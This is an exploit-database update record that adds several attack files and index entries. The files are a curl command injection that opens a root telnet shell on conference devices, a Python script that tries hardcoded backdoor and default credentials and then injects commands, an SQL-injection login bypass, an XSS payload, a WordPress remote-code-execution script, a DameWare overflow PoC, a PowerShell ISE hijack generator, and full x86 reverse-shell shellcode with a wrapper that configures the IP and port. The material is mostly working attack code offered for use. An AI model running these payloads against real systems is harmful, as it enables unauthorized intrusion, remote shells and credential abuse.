DB: 2019-05-04

9 changes to exploits/shellcodes

SolarWinds DameWare Mini Remote Control 10.0 - Denial of Service

Windows PowerShell ISE - Remote Code Execution

Blue Angel Software Suite - Command Execution
Crestron AM/Barco wePresent WiPG/Extron ShareLink/Teq AV IT/SHARP PN-L703WA/Optoma WPS-Pro/Blackbox HD WPS/InFocus LiteShow - Remote Command Injection
Instagram Auto Follow - Authentication Bypass
Zotonic < 0.47.0 mod_admin - Cross-Site Scripting
Wordpress Plugin Social Warfare < 3.5.3 - Remote Code Execution

Linux/x86 - Reverse Shell Shellcode (91 Bytes) + Python Wrapper
Linux/x86 - Openssl Encrypt Files With aes256cbc Shellcode (185 bytes)

exploits/hardware/webapps/46786.txt

@@ -0,0 +1,40 @@
+##
+# Exploit Title: Barco/AWIND OEM Presentation Platform Unauthenticated Remote Command Injection 
+# Date: 05/01/2019
+# Exploit Author: Jacob Baines
+# Tested on: Crestron AM-100 1.6.0.2
+# CVE : CVE-2019-3929
+# PoC Video: https://www.youtube.com/watch?v=q-PIjnPcu2k
+# Advisory: https://www.tenable.com/security/research/tra-2019-20
+# Writeup: https://medium.com/tenable-techblog/eight-devices-one-exploit-f5fc28c70a7c
+# Affected Vendors/Device/Firmware:
+#  - Crestron AM-100 1.6.0.2
+#  - Crestron AM-101 2.7.0.1
+#  - Barco wePresent WiPG-1000P 2.3.0.10
+#  - Barco wePresent WiPG-1600W before 2.4.1.19
+#  - Extron ShareLink 200/250 2.0.3.4
+#  - Teq AV IT WIPS710 1.1.0.7
+#  - InFocus LiteShow3 1.0.16
+#  - InFocus LiteShow4 2.0.0.7
+#  - Optoma WPS-Pro 1.0.0.5
+#  - Blackbox HD WPS 1.0.0.5
+#  - SHARP PN-L703WA 1.4.2.3
+##
+
+The following curl command executes the commands "/usr/sbin/telnetd -p 1271 -l /bin/sh" and "whoami" on the target device:
+
+curl --header "Content-Type: application/x-www-form-urlencoded" \
+--request POST \
+--data "file_transfer=new&dir='Pa_Note/usr/sbin/telnetd -p 1271 -l /bin/shPa_Note'whoami" \
+--insecure https://192.168.88.250/cgi-bin/file_transfer.cgi
+
+Example:
+
+albinolobster@ubuntu:~$ curl --header "Content-Type: application/x-www-form-urlencoded" --request POST --data "file_transfer=new&dir='Pa_Note/usr/sbin/telnetd -p 1271 -l /bin/shPa_Note'whoami" --insecure https://192.168.88.250/cgi-bin/file_transfer.cgi
+root
+albinolobster@ubuntu:~$ telnet 192.168.88.250 1271
+Trying 192.168.88.250...
+Connected to 192.168.88.250.
+Escape character is '^]'.
+
+~/boa/cgi-bin #

exploits/linux/remote/46792.py

@@ -0,0 +1,102 @@
+# Exploit Title: Blue Angel Software Suite - Authenticated Command Execution
+# Google Dork: N/A
+# Date: 02/05/2019
+# Exploit Author: Paolo Serracino 
+# Vendor Homepage: http://www.5vtechnologies.com
+# Software Link: N/A
+# Version: All
+# Tested on: Embedded Linux OS
+# CVE : N/A
+# Description: Blue Angel Software Suite, an application that runs on embedded devices for VOIP/SIP services is vulnerable to an authenticated 
+# command execution in ping command. All default accounts can be used to login and achieve command execution, including the guest one. 
+# Moreover there's another account, defined in the local file device.dat, that provides an apparently "backdoor" account.
+# A list of these accounts is hardcoded in the script.
+
+#/usr/bin/python
+import sys
+import requests
+
+
+def check_sw(target,port):
+
+  res = requests.get(target + ':' + port)
+
+  if '/cgi-bin/webctrl.cgi?action=index_page' in res.text:
+     return True
+  else:
+     print "[-] DOES NOT LOOK LIKE THE PAGE WE'RE LOOKING FOR"
+     return False
+
+def check_login(target,port,command):
+
+   if not check_sw(target,port):
+      sys.exit()
+
+   creds_common = [('blueangel','blueangel'), #the "backdoor" account
+                   ('root','abnareum10'),
+                   ('root','Admin@tbroad'),
+                   ('root','superuser'),
+                   ('user','user') ,
+                   ('guest','guest'),
+                   ]
+ 
+   for i in range(len(creds_common)):
+      postdata=[('action','login_authentication'),
+               ('redirect_action','sysinfo_page'),
+               ('login_username',creds_common[i][0]),
+               ('login_password',creds_common[i][1]),
+               ('B1','Login')
+               ]
+
+      res = requests.post(target + ':' + port + '/cgi-bin/webctrl.cgi',data=postdata)
+
+      if 'Set-Cookie' in res.headers:
+         cookie = res.headers.get('Set-Cookie')
+         print '[+] LOGGED IN WITH CREDENTIALS  ' + str(creds_common[i][0] + ' : ' + creds_common[i][1]) 
+         execute_cmd(target,port,cookie,command)  
+         return True
+
+
+def execute_cmd(target,port,cookie,cmd):
+
+   print '[+] EXECUTING COMMAND'
+   new_headers = ({'User-Agent':'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)',
+                 'Referer': target,
+                 'Cookie': cookie
+                })
+   res = requests.get(target + ':' + port + '/cgi-bin/webctrl.cgi?action=pingtest_update&ping_addr=127.0.0.1;' + cmd + '&B1=PING',headers=new_headers)
+   res_lines = res.text.splitlines()
+   result = []
+   copy = False
+
+   for line in res_lines:
+
+      if 'round-trip min/avg/max' in line:
+         copy = True
+      elif '</pre></body></html>' in line: 
+         copy = False
+      elif copy == True:
+         result.append(line)
+
+   print('[+] COMMAND RESPONSE')
+   print('------------------------------------------')
+
+   for r in result:
+      print r
+   print('------------------------------------------')
+
+
+def main():
+
+   if len(sys.argv) < 4:
+      print '[-] 3 ARGS: TARGET PORT SHELL_COMMAND'
+      sys.exit()
+   
+   target = sys.argv[1]   
+   port = sys.argv[2]
+   command = sys.argv[3]
+   if not check_login(target,port,command):
+      print '[-] COULD NOT FIND VALID CREDENTIALS'
+      
+if __name__ == "__main__":
+    main()

exploits/multiple/webapps/46788.txt

@@ -0,0 +1,28 @@
+# Exploit Title: Zotonic <=0.46 mod_admin (Erlang) - Reflective Cross-Site Scripting
+# Date: 24-04-2019
+# Exploit Author: Ramòn Janssen
+# Researchers: Jan-martin Sijs, Joost Quist, Joost Vondeling, Ramòn Janssen
+# Vendor Homepage: http://zotonic.com/
+# Software Link: https://github.com/zotonic/zotonic/releases/tag/0.46.0
+# Version: <=0.46
+# CVE : CVE-2019-11504
+
+Attack type
+Remote
+
+Impact
+Code Execution
+
+Zotonic versions prior to 0.47 have multiple authenticated Reflected Cross-Site Scripting (XSS) vulnerabilities in the management module. The vulnerabilitie can be exploited when an authenticated user with administrative permissions visits the crafted URL (i.e. when phished or visits a website containing the URL). The XSS effects the following URLs and parameters of the management module:
+- /admin/overview/ [qcat, qcustompivot, qs]
+- /admin/users/ [qs]
+- /admin/media/ [qcat,qcustompivot, qs]
+
+Example: https://[host]/admin/overview?qcustompivot="><script>prompt(‘XSS’)</script>
+
+Affected source code file zotonic_mod_admin:
+- zotonic_mod_admin_identity\priv\templates\_admin_sort_header.tpl
+- zotonic_mod_admin_identity\priv\templates\admin_users.tpl
+
+Reference(s)
+http://docs.zotonic.com/en/latest/developer-guide/releasenotes/rel_0.47.0.html

exploits/php/webapps/46787.txt

@@ -0,0 +1,12 @@
+# Exploit Title: Instagram Auto Follow - Autobot Instagram - Authentication Bypass
+# Date: 2019-05-01
+# Exploit Author: Veyselxan
+# Vendor Homepage: https://codecanyon.net/item/instagram-auto-follow-autobot-instagram/23720743?s_rank=4
+
+# Tested on: Linux
+https://eowynlab.cf/autobot-follow/index.php
+
+
+username: admin' or '1'='1
+
+Password: admin' or '1'='1

exploits/php/webapps/46794.py

@@ -0,0 +1,67 @@
+# Title: RCE in Social Warfare Plugin Wordpress ( <=3D3.5.2 )
+# Date: March, 2019
+# Researcher: Luka Sikic
+# Exploit Author: hash3liZer
+# Download Link: https://wordpress.org/plugins/social-warfare/
+# Reference: https://wpvulndb.com/vulnerabilities/9259?fbclid=3DIwAR2xLSnan=ccqwZNqc2c7cIv447Lt80mHivtyNV5ZXGS0ZaScxIYcm1XxWXM
+# Github: https://github.com/hash3liZer/CVE-2019-9978
+# Version: <=3D 3.5.2
+# CVE: CVE-2019-9978
+
+# Title: RCE in Social Warfare Plugin Wordpress ( <=3.5.2 )
+# Date: March, 2019
+# Researcher: Luka Sikic
+# Exploit Author: hash3liZer
+# Download Link: https://wordpress.org/plugins/social-warfare/
+# Reference: https://wpvulndb.com/vulnerabilities/9259?fbclid=IwAR2xLSnanccqwZNqc2c7cIv447Lt80mHivtyNV5ZXGS0ZaScxIYcm1XxWXM
+# Github: https://github.com/hash3liZer/CVE-2019-9978
+# Version: <= 3.5.2
+# CVE: CVE-2019-9978
+
+import sys
+import requests
+import re
+import urlparse
+import optparse
+
+class EXPLOIT:
+
+	VULNPATH = "wp-admin/admin-post.php?swp_debug=load_options&swp_url=%s"
+
+	def __init__(self, _t, _p):
+		self.target  = _t
+		self.payload = _p
+
+	def engage(self):
+		uri = urlparse.urljoin( self.target, self.VULNPATH % self.payload )
+		r = requests.get( uri )
+		if r.status_code == 500:
+			print "[*] Received Response From Server!"
+			rr  = r.text
+			obj = re.search(r"^(.*)<\!DOCTYPE", r.text.replace( "\n", "lnbreak" ))
+			if obj:
+				resp = obj.groups()[0]
+				if resp:
+					print "[<] Received: "
+					print resp.replace( "lnbreak", "\n" )
+				else:
+					sys.exit("[<] Nothing Received for the given payload. Seems like the server is not vulnerable!")
+			else:
+				sys.exit("[<] Nothing Received for the given payload. Seems like the server is not vulnerable!")
+		else:
+			sys.exit( "[~] Unexpected Status Received!" )
+
+def main():
+	parser = optparse.OptionParser(  )
+
+	parser.add_option( '-t', '--target', dest="target", default="", type="string", help="Target Link" )
+	parser.add_option( ''  , '--payload-uri', dest="payload", default="", type="string", help="URI where the file payload.txt is located." )
+
+	(options, args) = parser.parse_args()
+
+	print "[>] Sending Payload to System!"
+	exploit = EXPLOIT( options.target, options.payload )
+	exploit.engage()
+
+if __name__ == "__main__":
+	main()

exploits/windows/dos/46793.txt

@@ -0,0 +1,32 @@
+#Vendor:     Solarwinds
+#Site Vendor:    https://www.dameware.com/
+#Product:     Dameware Mini Remote Control
+#Version:    10.0 x64
+#Platform:    Windows
+#Tested on:    Windows 7 SP1 x64
+#Dscription:    The DWRCC executable file is affected by a buffer overflow vulnerability.
+#The buffer size passed in on the machine name parameter is not checked
+#Vector:    pass buffer to the machine host name parameter
+
+#Author:    Dino Barlattani dinbar78@gmail.com
+#Link:        http://www.binaryworld.it
+
+#CVE ID:    CVE-2019-9017
+
+#POC in VB Script
+
+option explicit
+dim fold,exe,buf,i,wsh,fso,result
+exe = "DWRCC.exe"
+fold = "C:\program files\SolarWinds\DameWare Mini Remote Control 10.0 x64
+#1\"
+for i = 0 to 300
+    buf = buf & "A"
+next
+set wsh = createobject("wscript.shell")
+set fso = createobject("scripting.filesystemobject")
+if fso.folderexists(fold) then
+    fold = fold & exe
+    fold = chr(34) & fold & chr(34)
+    result = wsh.run(fold & " -c: -h: -m:" & buf,0,true)
+end if

exploits/windows/local/46790.txt

@@ -0,0 +1,155 @@
+[+] Credits: John Page (aka hyp3rlinx)		
+[+] Website: hyp3rlinx.altervista.org
+[+] Source:  http://hyp3rlinx.altervista.org/advisories/WINDOWS-POWERSHELL-ISE-FILENAME-PARSING-FLAW-RCE-0DAY.txt 
+[+] ISR: ApparitionSec          
+[+] Zero Day Initiative Program
+
+
+[Vendor]
+www.microsoft.com
+
+
+[Product]
+Windows PowerShell ISE
+
+The Windows PowerShell Integrated Scripting Environment (ISE) is a host application for Windows PowerShell.
+In the ISE, you can run commands and write, test, and debug scripts in a single Windows-based graphic user interface.
+
+
+[Vulnerability Type]
+Filename Parsing Flaw Remote Code Execution 0day
+
+
+[References]
+ZDI-CAN-8005
+
+
+[Security Issue]
+Windows PowerShell ISE will execute wrongly supplied code when debugging specially crafted PowerShell scripts that contain
+array brackets as part of the filename. This can result in ISE executing attacker supplied scripts pointed to by the filename
+and not the "trusted" PS file currently loaded and being viewed by a user in the host application. This undermines the integrity of
+PowerShell ISE allowing potential unexpected remote code execution.
+
+In PowerShell brackets are used to access array elements.
+
+PS C:\> $a=1..10
+PS C:\> $a[4]
+5
+
+However, when brackets are used as part of the filename it can be used to hijack the currently loaded file in place of another malicious file.
+That file must contain a single matching char value which is also found in our specially crafted filename.
+
+Requirements are both files must reside in the same directory. Example, if a file named [HelloWorldTutoria1].ps1 resides alongside a
+file named 1.ps1 it will create a script hijacking condition. Note, the last letter is a number "1" not a lowercase "L".
+
+Other things I discovered playing with PS filenames is we can target scripts using a single alphabetic or numeric char and certain symbols.
+PowerShell scripts with only a single quote also work, [Pwned'].ps1 will load and execute ===> '.ps1 if debugged from the vuln ISE application.
+
+These chars also get the job done:
+"$" "_" "#" "^"  plus any single case insensitive letter a-z or numbers 0-9, [Hello_World].ps1 ====> _.ps1
+
+[Hello].ps1 will execute this instead =====> h.ps1
+
+Dashes "-" throw the following error: "The specified wildcard character pattern is not valid: [Hello-World].ps1" when pointing to
+another PS file named -.ps1 and seems to treat it sort of like a meta-character.
+
+[pw3d].ps1 <===== expected to execute
+
+3.ps1 <===== actually executed
+
+This exploits the trust between PowerShell ISE and the end user. So scripts debugged local or over a network share display "trusted" code
+in ISE that is expected to run. However, when the user debugs the script a different script gets executed.
+Interestingly, that second script does NOT get loaded into PowerShell ISE upon execution, so a user may not see anything amiss.
+
+User interaction is required for a successful attack to occur and obviously running any unknown PowerShell script can be dangerous. 
+Again, this exploit takes advantage of "trust" where users can see and read the code and will trust it as everything looks just fine and
+yet ... still they get PWNED!.
+
+Tested successfully on Win7/10
+
+Long live user interaction! lol...
+
+
+[POC Video URL]
+https://www.youtube.com/watch?v=T2I_-iUPaFw
+
+
+[Exploit/POC]
+After opening PS files in ISE, set the execution policy so can test without issues.
+set-executionpolicy unrestricted -force
+
+PS scripts over Network shares may get 'RemoteSigned' security policy issue so run below cmd.
+
+set-executionpolicy unrestricted -force process
+Choose 'R' to run once.
+
+Below Python script will create two .ps1 files to demonstrate the vulnerable condition.
+Examine the code, what does it say? it reads... Write-output "Hello World!"... now Run it...
+
+BAM! other PS script executes!.
+
+
+#PowerShell ISE 0day Xploit
+#ZDI-CAN-8005
+#ZDI CVSS: 7.0
+#hyp3rlinx
+#ApparitionSec
+
+
+fname1="[HelloWorldTutoria1].ps1"    #Expected code to run is 'HelloWorld!'
+fname2="1.ps1"                       #Actual code executed is calc.exe for Poc
+evil_code="start calc.exe"           #Edit to suit your needs.
+c=0
+payload1='Write-Output "Hello World!"'
+payload2=evil_code+"\n"+'Write-Output "Hello World!"'
+
+def mk_ps_hijack_script():
+    global c
+    c+=1
+    f=open(globals()["fname"+str(c)],"wb")
+    f.write(globals()["payload"+str(c)])
+    f.close()
+    if c<2:
+        mk_ps_hijack_script()
+        
+
+if __name__=="__main__":
+    mk_ps_hijack_script()
+    print "PowerShell ISE Xploit 0day Files Created!"
+    print "Discovery by hyp3rlinx"
+    print "ZDI-CAN-8005"
+
+
+
+[Network Access]
+Remote
+
+
+[Severity]
+High
+
+
+[Disclosure Timeline]
+ZDI Case opened : 2019-02-06
+Case officially contracted to ZDI : 2019-02-20
+
+Vendor Disclosure : 2019-03-01
+submitted to the vendor as ZDI-CAN-8005.
+
+April 25, 2019 : MSRC response (as per ZDI): "we've determined that this doesn't meet the bar for servicing via a security update.
+we have opened a bug with the PowerShell team, and this is something they may address in a future release as a form of defense-in-depth."
+
+ZDI also indicated they too will close the case.
+May 1, 2019 : Public Disclosure
+
+
+
+[+] Disclaimer
+The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
+Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
+that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
+is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
+for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
+or exploits by the author or elsewhere. All content (c).
+
+hyp3rlinx

files_exploits.csv

@@ -6407,6 +6407,7 @@ id,file,description,date,author,type,platform,port
 46760,exploits/linux/dos/46760.txt,"systemd - DynamicUser can Create setuid Binaries when Assisted by Another Process",2019-04-26,"Google Security Research",dos,linux,
 46778,exploits/windows/dos/46778.py,"SpotAuditor 5.2.6 - 'Name' Denial of Service (PoC)",2019-04-30,"Victor Mondragón",dos,windows,
 46781,exploits/linux/dos/46781.txt,"Linux - Missing Locking Between ELF coredump code and userfaultfd VMA Modification",2019-04-30,"Google Security Research",dos,linux,
+46793,exploits/windows/dos/46793.txt,"SolarWinds DameWare Mini Remote Control 10.0 - Denial of Service",2019-05-03,"Dino Barlattani",dos,windows,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -10450,6 +10451,7 @@ id,file,description,date,author,type,platform,port
 46755,exploits/windows/local/46755.py,"Lavavo CD Ripper 4.20 - 'License Activation Name' Buffer Overflow (SEH)",2019-04-25,Achilles,local,windows,
 46756,exploits/windows/local/46756.rb,"RARLAB WinRAR 5.61 - ACE Format Input Validation Remote Code Execution (Metasploit)",2019-04-25,Metasploit,local,windows,
 46779,exploits/windows/local/46779.py,"DeviceViewer 3.12.0.1 - 'user' SEH Overflow",2019-04-30,"Hayden Wright",local,windows,
+46790,exploits/windows/local/46790.txt,"Windows PowerShell ISE - Remote Code Execution",2019-05-03,hyp3rlinx,local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -17375,6 +17377,7 @@ id,file,description,date,author,type,platform,port
 46782,exploits/windows/remote/46782.rb,"AIS logistics ESEL-Server - Unauth SQL Injection RCE (Metasploit)",2019-04-30,Metasploit,remote,windows,
 46783,exploits/php/remote/46783.rb,"Pimcore < 5.71 - Unserialize RCE (Metasploit)",2019-04-30,Metasploit,remote,php,
 46785,exploits/linux/remote/46785.rb,"Ruby On Rails - DoubleTap Development Mode secret_key_base Remote Code Execution (Metasploit)",2019-05-02,Metasploit,remote,linux,3000
+46792,exploits/linux/remote/46792.py,"Blue Angel Software Suite - Command Execution",2019-05-03,"Paolo Serracino_ Pietro Minniti_ Damiano Proietti",remote,linux,
 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@@ -41217,3 +41220,7 @@ id,file,description,date,author,type,platform,port
 46784,exploits/linux/webapps/46784.txt,"CentOS Web Panel 0.9.8.793 (Free) / v0.9.8.753 (Pro) / 0.9.8.807 (Pro) - Domain Field (Add DNS Zone) Cross-Site Scripting",2019-05-01,DKM,webapps,linux,
 46777,exploits/php/webapps/46777.txt,"Agent Tesla Botnet - Information Disclosure",2019-04-30,n4pst3r,webapps,php,
 46780,exploits/windows/webapps/46780.py,"Oracle Weblogic 10.3.6.0.0 / 12.1.3.0.0 - Remote Code Execution",2019-04-30,"Avinash Kumar Thapa",webapps,windows,
+46786,exploits/hardware/webapps/46786.txt,"Crestron AM/Barco wePresent WiPG/Extron ShareLink/Teq AV IT/SHARP PN-L703WA/Optoma WPS-Pro/Blackbox HD WPS/InFocus LiteShow - Remote Command Injection",2019-05-03,"Jacob Baines",webapps,hardware,
+46787,exploits/php/webapps/46787.txt,"Instagram Auto Follow - Authentication Bypass",2019-05-03,Veyselxan,webapps,php,
+46788,exploits/multiple/webapps/46788.txt,"Zotonic < 0.47.0 mod_admin - Cross-Site Scripting",2019-05-03,"Ramòn Janssen",webapps,multiple,
+46794,exploits/php/webapps/46794.py,"Wordpress Plugin Social Warfare < 3.5.3 - Remote Code Execution",2019-05-03,hash3liZer,webapps,php,

files_shellcodes.csv

@@ -959,3 +959,5 @@ id,file,description,date,author,type,platform
 46704,shellcodes/linux_x86/46704.txt,"Linux/x86 - Cat File Encode to base64 and post via curl to Webserver Shellcode (125 bytes)",2019-04-15,strider,shellcode,linux_x86
 46736,shellcodes/arm/46736.txt,"Linux/ARM - Password-Protected Reverse TCP Shellcode (100 bytes)",2019-04-22,"Alan Vivona",shellcode,arm
 46746,shellcodes/generator/46746.txt,"Linux/x86 - Rabbit Shellcode Crypter (200 bytes)",2019-04-24,"Petr Javorik",shellcode,generator
+46789,shellcodes/linux_x86/46789.txt,"Linux/x86 - Reverse Shell Shellcode (91 Bytes) + Python Wrapper",2019-05-03,"Dave Sully",shellcode,linux_x86
+46791,shellcodes/linux_x86/46791.c,"Linux/x86 - Openssl Encrypt Files With aes256cbc Shellcode (185 bytes)",2019-05-03,strider,shellcode,linux_x86

shellcodes/linux_x86/46789.txt

@@ -0,0 +1,242 @@
+# Exploit Title: Linux/x86 - Reverse Shell Shellcode (91 Bytes) + Python Wrapper
+# Google Dork: NA
+# Date: 2019-05-01
+# Exploit Author: Dave Sully	
+# Vendor Homepage: 
+# Software Link: NA
+# Version: NA
+# Tested on: Ubuntu 16.04
+# CVE : NA
+
+#######################################################################
+#######################################################################
+
+# This is the raw assembly 
+
+#######################################################################
+#######################################################################
+
+; Filename: reverse_shell.nasm
+; Author:  Dave Sully
+; Website:  http://suls.co.uk
+; Purpose: Reverse shell in x86 assembly 
+
+global _start			
+
+section .text
+_start:
+
+	; Clear everthing we are using 
+	xor eax, eax 
+	xor ebx, ebx 
+	xor ecx, ecx 
+	xor edx, edx 
+	xor esi, esi
+	xor edi, edi
+
+	; Define structure for socket 
+	; push 0x0100007f ; Push IP to stack in reverse byte order ; need to revist the null bytes here  (127.0.0.1)
+	; We have a issue here in that the ip address 127.0.0.1 = 0x0100007f in hex which contains null bytes 
+	; Easiest way around this is to XOR the value with 0xffffffff
+	mov edi, 0xfeffff80 ; xor of 0x0100007f and 0xffffffff
+	xor edi, 0xffffffff
+	push edi
+	push word 0xb315 ; Push 5555 to the stack in reverse byte order 5555 in hex = 0x15b3 
+	push word 0x2 ; push 2  to the stack (AF-INET) 
+
+	; Create socket 
+	; s = socket(AF_INET, SOCK_STREAM, 0)
+	mov ax, 0x167 ; Syscall 359 (socket)
+	mov bl, 0x2 ; AF-INET (2) 
+	mov cl, 0x1 ; Sock stream (1) 
+	; dl should already be zero 
+	int 0x80 ; call system interupt to create socket 
+	xchg esi, eax ; socket file descriptor now stored in esi 
+
+	; Connect socket 
+	; connect(s, (struct sockaddr *)&addr, sizeof(addr));
+	mov ax, 0x16a ; Syscall 362 connect 
+	mov ebx, esi ; Move socket file descriptor into ebx 
+	mov ecx, esp ; Point ecx to the top of the stack which has our address structure on it 
+	mov dl, 0x10 ; Size of structure (16)
+	int 0x80 ; call system interupt to create connect 
+
+	; Dup input output and error file descriptors 
+	; dup2(s, 0); // Dup2 sycall = 63  
+	xor eax, eax ; Clear eax 
+	mov ebx, esi ; move socket id to ebx 
+	xor ecx, ecx ; Clear ecx 
+	mov cl, 0x2 ; set ecx to 2 
+loop:
+	mov al, 0x3f ; syscall 63 
+	int 0x80 ; call dup 2 
+	dec ecx  ; decrease ecx by 1 
+	jns loop ; jump if not signed back to loop, this should cycle 2,1,0
+
+	; Execute Shell 
+	; execve("/bin/sh",0 ,0); // Execve syscall = 11
+	; (const char *filename, char *const argv[], char *const envp[]);
+	xor eax,eax ; null eax 
+	mov al, 0xb ; syscall 11 into eax
+	xor ebx, ebx ; zero ebx 
+	push ebx ; push a null string to the stack to terminate our string 
+	push 0x68732f2f ; hs//
+	push 0x6e69622f ; nib/
+	mov ebx, esp ; point ebx at the stack
+	xor ecx, ecx ; clear ecx and edx as they are used in the syscall 
+	xor edx, edx
+	int 0x80 
+
+section .data
+
+#######################################################################
+#######################################################################
+
+### Compile and link as follows 
+
+nasm -f elf32 -o reverse_shell.o reverse_shell.nasm 
+gcc -o reverse_shell reverse_shell.o 
+
+
+#######################################################################
+#######################################################################
+
+### To configure IP and port use the following python3 wrapper script 
+
+#######################################################################
+#######################################################################
+
+
+#!/usr/bin/env python3 
+# File: wrapper.py
+# Author: Dave Sully 
+# Reverse shell wrapper in python3 
+# Usage: python3 wrapper.py 192.168.1.1 5000
+
+import argparse
+import socket 
+from struct import unpack
+
+print("\n*****************************************")
+print("***** Reverse shell wrapper script ******")
+print("*****************************************")
+
+# Grab command line args (ip and port) 
+parser = argparse.ArgumentParser() 
+parser.add_argument("ip")
+parser.add_argument("port")
+args = parser.parse_args() 
+# check port is in a valid range 
+if ((int(args.port) > 65535) or (int(args.port) < 256)):
+    print("\nPort number must be between 256 and 65535\n")
+    exit()
+
+# Xor Function 
+def xor_strings(str1,str2):
+    result =  int(str1,16) ^ int(str2,16)
+    return '{:x}'.format(result)
+
+# Process IP address
+print("\nIP address: "+ args.ip)
+# Convert IP to Hex 
+hexip = socket.inet_aton(args.ip).hex() 
+print("Hex IP Address: "+hexip)
+# Reverse the hex String 
+revhexip = hexip[6:8]
+revhexip = revhexip + hexip[4:6]
+revhexip = revhexip + hexip[2:4]
+revhexip = revhexip + hexip[0:2]
+# Xor the reversed hex address as the shellcode XORs this address to avoid null bytes 
+xored_ip = xor_strings(revhexip,"FFFFFFFF")
+print("XORed reverse hex IP Address: "+ xored_ip) 
+
+# Process Port
+print("\nPort: "+args.port)
+# Convert Port to hex 
+hexport = hex(int(args.port)).replace('0x','')
+if len(hexport)<4:
+    hexport = '0'+hexport
+print("Hex Port: "+hexport)
+revhexport = hexport[2:4]+ hexport[0:2] 
+print("Reverse Hex Port: "+revhexport)
+
+# Check for null bytes 
+if (xored_ip[0:2]=="00" or 
+    xored_ip[2:4]=="00" or 
+    xored_ip[4:6]=="00" or 
+    xored_ip[6:8]=="00" or 
+    revhexport[0:2]=="00" or 
+    revhexport[2:4]=="00"):
+    print("\n** WARNING ** Null Bytes detected in Xored IP or port shellcode,")
+    print("shellcode may not work !\n")
+
+# Construct Shellcode 
+shellcode= \
+"\\x31\\xc0\\x31\\xdb\\x31\\xc9\\x31\\xd2\\x31\\xf6\\x31\\xff\\xbf" + \
+    "\\x"+ xored_ip[6:8] + \
+    "\\x"+ xored_ip[4:6] + \
+    "\\x"+ xored_ip[2:4] + \
+    "\\x"+ xored_ip[0:2] + \
+"\\x83\\xf7\\xff\\x57\\x66\\x68" + \
+    "\\x"+ revhexport[2:4] + \
+    "\\x"+ revhexport[0:2] + \
+"\\x66\\x6a\\x02\\x66\\xb8\\x67\\x01\\xb3\\x02\\xb1\\x01\\xcd\\x80\\x96\\x66" + \
+"\\xb8\\x6a\\x01\\x89\\xf3\\x89\\xe1\\xb2\\x10\\xcd\\x80\\x31\\xc0\\x89\\xf3" + \
+"\\x31\\xc9\\xb1\\x02\\xb0\\x3f\\xcd\\x80\\x49\\x79\\xf9\\x31\\xc0\\xb0\\x0b" + \
+"\\x31\\xdb\\x53\\x68\\x2f\\x2f\\x73\\x68\\x68\\x2f\\x62\\x69\\x6e\\x89\\xe3" + \
+"\\x31\\xc9\\x31\\xd2\\xcd\\x80"
+# Output Shellcode 
+print("\nShellcode (Length 91 Bytes): \n")
+print(shellcode+"\n")
+
+#######################################################################
+#######################################################################
+
+# Example output
+
+*****************************************
+***** Reverse shell wrapper script ******
+*****************************************
+
+IP address: 127.0.0.1
+Hex IP Address: 7f000001
+XORed reverse hex IP Address: feffff80
+
+Port: 8080
+Hex Port: 1f90
+Reverse Hex Port: 901f
+
+Shellcode (Length 91 Bytes): 
+
+\x31\xc0\x31\xdb\x31\xc9\x31\xd2\x31\xf6\x31\xff\xbf\x80\xff\xff\xfe\x83\xf7\xff\x57\x66\x68\x1f\x90\x66\x6a\x02\x66\xb8\x67\x01\xb3\x02\xb1\x01\xcd\x80\x96\x66\xb8\x6a\x01\x89\xf3\x89\xe1\xb2\x10\xcd\x80\x31\xc0\x89\xf3\x31\xc9\xb1\x02\xb0\x3f\xcd\x80\x49\x79\xf9\x31\xc0\xb0\x0b\x31\xdb\x53\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x31\xd2\xcd\x80
+
+
+#######################################################################
+#######################################################################
+
+# To compile shellcode from the wrapper script use the following C program 
+# Replacing the shellcode with the wrapper script shellcode output
+
+#######################################################################
+#######################################################################
+
+// Filename: shellcode.c
+#include<stdio.h>
+#include<string.h>
+
+unsigned char code[] = \
+"\x31\xc0\x31\xdb\x31\xc9\x31\xd2\x31\xf6\x31\xff\xbf\x80\xff\xff\xfe\x83\xf7\xff\x57\x66\x68\x1f\x90\x66\x6a\x02\x66\xb8\x67\x01\xb3\x02\xb1\x01\xcd\x80\x96\x66\xb8\x6a\x01\x89\xf3\x89\xe1\xb2\x10\xcd\x80\x31\xc0\x89\xf3\x31\xc9\xb1\x02\xb0\x3f\xcd\x80\x49\x79\xf9\x31\xc0\xb0\x0b\x31\xdb\x53\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x31\xd2\xcd\x80";
+
+main()
+{
+	printf("Shellcode Length:  %d\n", strlen(code));
+	int (*ret)() = (int(*)())code;
+	ret();
+}
+
+#######################################################################
+#######################################################################
+
+# Compile with 
+
+gcc -fno-stack-protector -z execstack -o shellcode shellcode.c

shellcodes/linux_x86/46791.c

@@ -0,0 +1,67 @@
